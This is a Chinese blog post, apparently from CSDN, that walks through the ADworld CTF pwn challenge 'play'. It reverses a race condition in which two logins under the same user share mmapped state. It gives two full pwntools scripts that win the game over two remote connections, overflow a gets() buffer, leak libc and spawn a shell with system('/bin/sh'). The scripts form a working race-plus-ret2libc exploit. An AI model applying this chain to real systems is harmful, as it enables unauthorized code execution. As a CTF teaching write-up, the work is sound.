ADworld pwn wp - play

最新推荐文章于 2022-06-14 23:57:34 发布
最新推荐文章于 2022-06-14 23:57:34 发布
阅读量277 收藏
点赞数 1
分类专栏: PWN 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33976344/article/details/120166675
版权

前言

一道race condition题目, 双线程共用同一内存就可能有漏洞

分析过程

在这里插入图片描述
一个一个函数看, 没啥稀奇的, 直到看到attack函数

int attack()
{
  int result; // eax
  int v1; // [esp+0h] [ebp-28h]
  int v2; // [esp+4h] [ebp-24h]
  int v3; // [esp+8h] [ebp-20h]
  int v4; // [esp+Ch] [ebp-1Ch]
  int v5; // [esp+10h] [ebp-18h]
  int v6; // [esp+14h] [ebp-14h]
  int v7; // [esp+18h] [ebp-10h]
  int v8; // [esp+1Ch] [ebp-Ch]
  int v9; // [esp+20h] [ebp-8h]
  int v10; // [esp+24h] [ebp-4h]
  int savedregs; // [esp+28h] [ebp+0h]

  ++*((_DWORD *)gHero + 1);
  ++*(_DWORD *)(gMonster + 4);
  hero_recovery();
  mon_recovery();
  printf("%s display:%s\n", (const char *)gHero + 16, *(const char **)(*((_DWORD *)gHero + 20) + 12));
  printf("%s display:%s\n", (const char *)(gMonster + 16), *(const char **)(*(_DWORD *)(gMonster + 80) + 12));
  v6 = **(_DWORD **)(gMonster + 80);
  v5 = *(_DWORD *)(*(_DWORD *)(gMonster + 80) + 4);
  if ( *(_DWORD *)(*(_DWORD *)(gMonster + 80) + 16) && *(int *)(gMonster + 4) > 4 && rand() % 3 == 1 )
  {
    *(_DWORD *)(gMonster + 4) = 0;
    v5 += *(_DWORD *)(*(_DWORD *)(gMonster + 80) + 16);
    v6 += *(_DWORD *)(*(_DWORD *)(gMonster + 80) + 16);
  }
  v8 = **((_DWORD **)gHero + 20);
  v7 = *(_DWORD *)(*((_DWORD *)gHero + 20) + 4);
  if ( *(_DWORD *)(*(_DWORD *)(gMonster + 80) + 16) )
  {
    printf("use hiden_methods?(1:yes/0:no):");
    v4 = read_int();
    if ( v4 == 1 )
    {
      v7 += *(_DWORD *)(*((_DWORD *)gHero + 20) + 16);
      v8 += *(_DWORD *)(*((_DWORD *)gHero + 20) + 16);
    }
  }
  if ( v7 < v6 )
    *((_DWORD *)gHero + 2) -= v6 - v7;
  if ( v5 < v8 )
    *(_DWORD *)(gMonster + 8) -= v8 - v5;
  if ( *((int *)gHero + 2) <= 0 )
  {
    puts("you failed");
    *((_DWORD *)gHero + 2) = 0;
    release_all(v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, savedregs);
  }
  result = *(_DWORD *)(gMonster + 8);
  if ( result <= 0 )
  {
    puts("you win");
    if ( *(_DWORD *)gMonster == 3 )
    {
      puts("we will remember you forever!");
      vul_func();
      release_all(v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, savedregs);
    }
    puts("slave up");
    level_up();
    result = init_monster(*(_DWORD *)gMonster + 1);
  }
  return result;
}

中间有个vul_func具有挑衅意味的函数, 进去看直接是一个栈溢出, 而且没有canary保护

int vul_func()
{
  char s[72]; // [esp+0h] [ebp-48h] BYREF

  printf("what's your name:");
  gets(s);
  return printf("ok! %s ,welcome\n", s);
}

不过情况似乎没有表面那么简单, 因为想要进入这个函数, 需要赢得游戏本身
在这里插入图片描述

在这里插入图片描述

条件是Surplus == 0 && slave == 3
不用想, 正常打游戏一般不可能赢, 所以只能用hacker的方法打游戏
找一下ghero的引用
在这里插入图片描述

看到ghero在init_db中分配内存空间

void *__cdecl init_db(char *file)
{
  void *result; // eax

  gfd = open(file, 2);
  result = mmap(0, 0x1000u, 3, 1, gfd, 0);
  gHero = result;
  return result;
}

逆向回去
在这里插入图片描述
分配的空间和用户名相关
看看mmap的定义
void* mmap(void* start,size_t length,int prot,int flags,int fd,off_t offset);

可见如果控制登陆相同的用户, 那么分配到的空间是一样的, 那可以双开游戏, 登陆同一个用户, 就可以进行race condition的利用

漏洞利用

目的是打赢游戏, 看看技能表
在前两回合
不使用hiden_method时:
0: DDOS Attack 双方扣血
1: Overflow Attack 己方扣血, 对方加血
2: Middleman Attack 双方加血
3: Penetration Attack 双方加血

使用hiden_method时:
0: DDOS Attack 己方加血, 对方扣血
1: Overflow Attack 己方加血, 对方扣血
2: Middleman Attack 双方加血
3: Penetration Attack 双方加血

前两回合可以手动打赢, 但是重点是第三回合, 只有双方扣血/双方回血的技能效果但是对方血量是90 > 己方血量60, 这时是怎么都打不赢对面的, 所以只能开挂, 通过双开同时叠加两种技能效果, 己方加血, 对方扣血

在这里插入图片描述
一种可行的攻击模式为
线程A使用技能3, 在use hiden method阻塞输入时, 线程B修改技能为1, 再让A使用hiden method, 这样就能实现己方加血, 对方扣血的效果
打赢游戏后就是栈溢出, 泄露libc, get shell

from LibcSearcher import LibcSearcher
from pwn import *

url, port = "111.200.241.244", 51083
filename = "./pwn"
elf = ELF(filename)
# libc = ELF("")
# context(arch="amd64", os="linux")
context(arch="i386", os="linux")

debug = 0
context.log_level="debug"
if debug:
    ioA = process(filename)
    ioB = process(filename)
    # context.terminal = ['tmux', 'splitw', '-h']
    # gdb.attach(io)
else:
    ioA = remote(url, port)
    ioB = remote(url, port)

def dbg():
    gdb.attach(ioA)
    pause()

def login(io, name):  
   io.sendlineafter("login:", name)  
  
def attack(io):  
   io.sendlineafter("choice>> ","1")  
  
def use_hiden_method(io, choice):  
   io.sendlineafter("(1:yes/0:no):",str(choice))  
  
def change_skill(io, choice):  
   io.sendlineafter("choice>> ","3")  
   io.sendlineafter("choice>> ", str(choice))  
  
def hacking_attack(ioA, ioB):  
   change_skill(ioA, 3)  
   attack(ioA)  
   change_skill(ioB,1)  
   use_hiden_method(ioA, 1)  

def pwn():
    login(ioA, "hack")
    login(ioB, "hack")

    while True:
        hacking_attack(ioA, ioB)
        content = ioA.recvuntil("\n")
        if b"you win" in content:
            content = ioA.recvuntil("\n")
            if b"we will remember you forever!" in content:
                break

    puts_plt = elf.plt['puts']
    puts_got = elf.got['puts']
    vul_addr = elf.sym['vul_func']
    payload = cyclic(0x48 + 4) + p32(puts_plt) + p32(vul_addr) + p32(puts_got)
    # dbg()
    ioA.sendlineafter("what's your name:", payload)
    ioA.recvuntil("welcome\n")
    puts_addr = u32(ioA.recv(4))
    log.info("puts address: %#x" % puts_addr)

    libc = LibcSearcher("puts", puts_addr)
    libc_base = puts_addr - libc.dump("puts")
    system_addr = libc.dump("system") + libc_base
    binsh_addr = libc.dump("str_bin_sh") + libc_base
    log.info("libc base address: %#x" % libc_base)
    log.info("system address: %#x" % system_addr)
    log.info("bin sh address: %#x" % binsh_addr)
    # dbg()
    payload = cyclic(0x48 + 4) + p32(system_addr) + cyclic(4) + p32(binsh_addr)
    ioA.sendlineafter("what's your name:", payload)
    ioA.recvuntil("\n")
    ioA.interactive()

if __name__ == '__main__':
    pwn()

不过问题在于LibcSearcher不靠谱, 搜索到的libc版本不对, 需要到libc-database手动搜索最后发现是
libc6-i386_2.23-0ubuntu10_amd64

修改exp

from LibcSearcher import LibcSearcher
from pwn import *

url, port = "111.200.241.244", 62580
filename = "./pwn"
elf = ELF(filename)
# libc = ELF("")
# context(arch="amd64", os="linux")
context(arch="i386", os="linux")

debug = 0
context.log_level="debug"
if debug:
    ioA = process(filename)
    ioB = process(filename)
    # context.terminal = ['tmux', 'splitw', '-h']
    # gdb.attach(io)
else:
    ioA = remote(url, port)
    ioB = remote(url, port)

def dbg():
    gdb.attach(ioA)
    pause()

def login(io, name):  
   io.sendlineafter("login:", name)  
  
def attack(io):  
   io.sendlineafter("choice>> ","1")  
  
def use_hiden_method(io, choice):  
   io.sendlineafter("(1:yes/0:no):",str(choice))  
  
def change_skill(io, choice):  
   io.sendlineafter("choice>> ","3")  
   io.sendlineafter("choice>> ", str(choice))  
  
def hacking_attack(ioA, ioB):  
   change_skill(ioA, 3)  
   attack(ioA)  
   change_skill(ioB,1)  
   use_hiden_method(ioA, 1)  

def pwn():
    login(ioA, "hack")
    login(ioB, "hack")

    while True:
        hacking_attack(ioA, ioB)
        content = ioA.recvuntil("\n")
        if b"you win" in content:
            content = ioA.recvuntil("\n")
            if b"we will remember you forever!" in content:
                break

    puts_plt = elf.plt['puts']
    puts_got = elf.got['puts']
    vul_addr = elf.sym['vul_func']
    payload = cyclic(0x48 + 4) + p32(puts_plt) + p32(vul_addr) + p32(puts_got)
    # dbg()
    ioA.sendlineafter("what's your name:", payload)
    ioA.recvuntil("welcome\n")
    puts_addr = u32(ioA.recv(4))
    log.info("puts address: %#x" % puts_addr)

    puts_libc_addr = 0x05f140
    system_libc_addr = 0x03a940
    binsh_libc_addr = 0x15902b
    libc_base = puts_addr - puts_libc_addr
    system_addr = libc_base + system_libc_addr
    binsh_addr = libc_base + binsh_libc_addr

    # libc = LibcSearcher("puts", puts_addr)
    # libc_base = puts_addr - libc.dump("puts")
    # system_addr = libc.dump("system") + libc_base
    # binsh_addr = libc.dump("str_bin_sh") + libc_base
    log.info("libc base address: %#x" % libc_base)
    log.info("system address: %#x" % system_addr)
    log.info("bin sh address: %#x" % binsh_addr)
    # dbg()
    payload = cyclic(0x48 + 4) + p32(system_addr) + cyclic(4) + p32(binsh_addr)
    ioA.sendafter("what's your name:", payload)
    ioA.interactive()

if __name__ == '__main__':
    pwn()

终于打通了, 不过flag在/home/ctf/文件夹下, 实在找不到的可以cd到~文件夹, 然后find . flag
在这里插入图片描述

总结

第一次打race condition, 对线程内存共用有了个直观认识, 安全的做法应该避免不同线程使用相同内存区域

卡点

(1) gets()需要读取到’\n’才能结束读取, 所以io交互需要sendline, 而不是send

(2) no matched libc,please add more libc or try others
参考https://blog.csdn.net/qq_40889704/article/details/116571781

(3) 本地打通了, 但是远程打不通, libcsearcher不给力啊
试试通过libc database来查, 期间隔了一周, 各种事耽误了, 其实一开始调了一天没打通, 血压高心情低落, 后来隔了一段时间闲的没事干又回来打, 这次想好了是通过libc-database来搜索libc版本, 然后推测服务器是ubuntu系统, 所以第一个选择libc版本就选对了, 泪目~

不过是真的好爽呀, 卡了一周的题终于打通了, 哭了

参考

https://blog.csdn.net/seaaseesa/article/details/103615984

fa1c4
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
探索并利用Race条件:RacePWN框架
gitblog_00078的博客
05-25 383
探索并利用Race条件:RacePWN框架 项目地址:https://gitcode.com/racepwn/racepwn 1. 项目简介 在信息安全领域,竞态条件(Race Condition)是一种可能导致系统漏洞的程序执行情况。为了帮助开发者检测和测试这类问题,我们向您推荐一款强大的工具——RacePWN。它是一个基于TCP连接协议的竞态条件攻击测试框架,由librace库和racepwn...
Race Condition是什么
软件工程小施同学 的专栏
02-11 1939
一、Race Condition(竞争条件、竞态条件、资源竞争 ) 1. 竞争(Race) 计算机运行过程中, 并发、 无序、 大量 的进程在使用 有限、 独占、 不可抢占 的资源,由于进程无限,资源有限,产生矛盾,这种矛盾称为竞争(Race)。 2. 竞争条件(Race Condition) 由于两个或者多个进程竞争使用不能被同时访问的资源,计算的正确性取决于多个线程的交替执行时序时,就会发生竞争条件(Race Condition)。 3. 竞争条件分为两类: -Mu..
pwn远程打通本地打不通的“玄学“问题解释
fa1c4的blog
09-30 2269
前言 速刷buu pwn题的时候碰到的问题, 本来配置了16/18/20三个版本虚拟机, 加上pwndocker, 基本可以涵盖各个版本环境的需求, 不过做到一个栈的题的时候发现出现了本地打不通, 远程能通的情况, 本来以为是个人的玄学体质导致的玄学bug, 搜索了解释, 才发现是另一回事 问题 查看本地glibc环境, 结果选择正确的glibc版本, 依然打不通本地 解决 参考 https://blog.csdn.net/fjh1997/article/details/107695261 得知glib
linux_pwnlab4.1_raceCondition
insomnia的博客
06-18 333
the first thing to do is to disable the defense: $ sudo sysctl -w fs.protected_symlinks=0 the vulnerable program #include <stdio.h> #include <unistd.h> #include <string.h> int main(...
adworld-wargame:我对https://adworld.xctf.org.cntask上的pwn挑战的利用
02-13
adworld-wargame 我对上的pwn挑战的利用
Adworld2012互联网营销世界大会PPT下载
07-23
教程名称: Adworld2012互联网营销世界大会PPT下载【】APPS新媒体运营及营销探索-岳建雄-搜狐【】体育营销动起来-陈鄂-力美【】品牌广告推动移动营销创新-郭伟-安沃传媒【】基于受众的网络广告交易市场-王岳龙-传漾...
dice_game.zip
06-16
资源为攻防世界上的pwn题目样本,主要就是设计缓冲区溢出,大家也可在攻防世界pwn练习题中获取,地址为https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=1&id=4694&page=1
Adworld2009互动营销年度盛典English介绍
09-18
Adworld2009互动营销年度盛典English介绍
【XCTF-RE】新手练习区-simple-unpack
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ld1cw8
Race Condition漏洞
qq_40712959的博客
01-17 1707
Race Condition Race Condition(竞争条件)是一种情形,在该情形下系统或者程序的输出受其他不可控事件的顺序或事件的影响。软件中的Race Condition通常出现在两个并发线程访问同一个共享资源。因而存在Race Condition漏洞的特权程序,通过对不可控事件施加影响,攻击者能够影响特权程序的输出。 常见的Race Condition漏洞有一下两类 Time-...
no matched libc,please add more libc or try others
m0_55906008的博客
05-04 593
打开libcSearcher目录下的libcdatabase: 输入以下命令 rm -rf * git clone https://github.com/niklasb/libc-database ./get ubuntu 通过查看libcdatabase下的README.md文件获得get更新指令,执行./get时可能会出现以下报错信息: Requirements for download or update ‘ubuntu’ are not met. Please, refer to README.
CTFWiki_PWN_LinuxPlatform_UserMode_Exploitation_StackOverflow_x86
A的博客
06-14 643
先看这个文章学习函数调用栈出栈时RIP指向栈存放函数返回地址的位置,这个地址我们可以改为一个汇编指令的地址,RIP一直往后面指,以那个地址为起点一直往后执行 把函数返回地址设为0804863A,会一直往后执行 ret2shellcode 把恶意汇编代码写到数组(代码块)里面,返回地址指向这个数组(代码块)首地址。 这个数组要可读写执行,全局变量(.bss)有这个特点 ljust() 用法 shellcraft.sh() 打印结果 计算偏移disass main反汇编 main 函数找到 main 的第一条指
ciscn_2019_c_1,The address should be an int number【libcsearcher】
amber_o0k的博客
11-06 300
from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' # context.log_level='debug' ru=lambda x:io.recvuntil(x) rl=lambda :io.recvline() sla=lambda x,y:io.sendlineafter(x,y) io=remote('node4.buuoj.cn',27181) elf=ELF('./cisc.
LibcSearcher报错:no matched libc,please add more libc or try others
qq_40889704的博客
05-09 3506
今天在CTF-wiki上学习缓冲区溢出攻击中的ret2libc 在编写攻击代码时,用到了一个名为LibcSearcher的库,来确定libc中某个函数的地址。 这里先给出库的链接:https://github.com/lieanu/LibcSearcher 但是按照wiki上给出的例子编写好攻击代码,在运行时报错了: no matched libc,please add more libc or try others 大概意思是找不到匹配的libc版本库。 进到LibcSearcher的libc-data
【python3】no matched libc,please add more libc or try others
amber_o0k的博客
11-15 1279
注意你py脚本文件所在文件内是否有其他的LibcSearcher.py(如果有你将导入错误的LibcSearcher) 用pip install LibcSearcher ,安装该库。 C:\Python39\Lib\LibcSearcher\libc-database\db /home/ctf/.local/lib/python3.6/site-packages/LibcSearcher ...
记一次bugku pwn题解4月27日
z1r0的博客
04-27 501
记一次bugku pwn题解4月27日 emmmm,远程环境很垃圾(2.19-0ubuntu6.15),笔者patchelf的时候才想起来没有2.19,所以直接用2.23。利用realloc调整了好多次都打不通。。。。。换了四次gadget从0一直测试到realloc+0x30。。。。(没意思,其实可以利用其他方式,比如fsop,当时想着可能马上就可以通了就没有再高兴换了。。 uaf漏洞一枚,还可以edit,直接fastbin attack乱杀。快速写完初始exp发现了一个很ganga的事情,打不通本地和
BUU PWN(一)
playmaker的博客
01-28 2084
test_your_nc 连上即可拿到shell rip from pwn import * context.log_level='debug' #p=process('./17pwn1') p=remote("node3.buuoj.cn","26137") p.recvuntil("please input\n") payload='a'*0xf+'a'*8+p64(0x401186) p.s...
libc、glibc和glib的关系
热门推荐
yasi_xi的专栏
08-11 8万+
转自:http://my.oschina.net/moooofly/blog/126260 【glibc 和 libc】  glibc 和 libc 都是 Linux 下的 C 函数库。  libc 是 Linux 下的 ANSI C 函数库;glibc 是 Linux 下的 GUN C 函数库。  ANSI C 和 GNU C 有什么区别呢?         ANS
pwn system(“/bin/sh“)失败的原因
weixin_42016744的博客
01-11 1879
这里写自定义目录标题现象原因 现象 栈溢出做pwn 题跳转到system("/bin/sh")报错 打开gdb调试发现报错: 得知glibc2.27以后引入xmm寄存器, 记录程序状态, 会执行movaps指令, 要求rsp是按16字节对齐的, 所以如果payload这样写 payload = cyclic(0x20 + 8) + p64(pop_rdi_addr) + p64(binsh_addr) + p64(system_addr) 弹出的数据是奇数个, 本地就会报错 但是改成偶数个pop payl

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值